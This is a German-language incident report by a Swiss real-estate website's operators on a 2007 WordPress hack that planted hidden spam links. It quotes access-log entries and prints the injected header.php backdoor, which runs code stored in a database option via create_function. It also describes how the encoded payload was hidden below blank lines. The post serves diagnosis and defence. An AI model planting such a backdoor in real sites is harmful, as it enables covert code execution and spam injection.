Wir haben festgestellt, dass auf unserer Seite Immobilien Zug Zürich Aargau Schweiz. Loft Luxusimmobilien Villen Häuser in den letzten Wochen vermehrt Benutzer mit Suchbegriffen unter der Gürtellinie gelandet sind. Eine erste Analyse hat zunächst kein Ergebnis gebracht, nach vermehrt einschlägigen Besuchern haben wir diese intensiviert. Die Suchbegriffe sind derzeit noch auf google sichtbar, auf unserer Webseite jedoch nicht.
Zusammenfassung der Ergebnisse:
--------------------------------------------------------------------------------------------------------------
1. Am 07.09.2007 wurde unsere header.php von IP Nummer 88.191.17.141 mittels POST request überschrieben
Auszug aus dem Access Log
88.191.17.141 [07/Sep/2007:10:51:36 +0200] POST /wp-admin/ theme-editor.php HTTP/1.1 302 - http://www.lofthome??/wp-admin/the…home+immobilien Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
88.191.17.141 [07/Sep/2007:10:52:08 +0200] POST /wp-admin/ theme-editor.php HTTP/1.1 302 - http://www.lofthome??/wp-admin/the…immobilien&a=te Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
--------------------------------------------------------------------------------------------------------------
2. Ein Login für diese IP bzw. diesen Benutzer können wir aufgrund der Logfiles nicht erkennen.
--------------------------------------------------------------------------------------------------------------
3. Die Änderung hat in header.php eine Function wp-headers angelegt.
php /* Don't remove this line. */ wp_head(); $wp_headers = create_function('', get_option("blog_headers"));
Weiter untem in der Datei dann der kritische Aufruf
div id="container"
div id="header"
php $wp_headers()
--------------------------------------------------------------------------------------------------------------
4. Die Funktion liest die Daten aus wp_option für den Key blog_headers.
--------------------------------------------------------------------------------------------------------------
5. Das Feld der Tabelle enthielt zuerst eine unverfänglich aussehende Zeile
DOCTYPE html PUBLIC //W3C//DTD XHTML 1.0 Transitional//EN ...
dann ca. 20 Leerzeilen, sodass der weitere Inhalt auf Anhieb gar nicht erkennbar war und dann Hexadezimal rund 300 versteckte Links
mit einem encode Befehl am Ende.
--------------------------------------------------------------------------------------------------------------
6. Das Ergebnis war verheerend. Inzwischen alle Accounts geändert, WP User admin gelöscht, FTP account geändert.
Trotzdem bleibt die Frage:
WIE KANN DIE HEADER.PHP IN UNSEREM THEME GEÄNDERT WORDEN SEIN, OHNE DASS ZUVOR EIN LOGIN AUF UNSERE SEITE STATTGEFUNDEN HAT?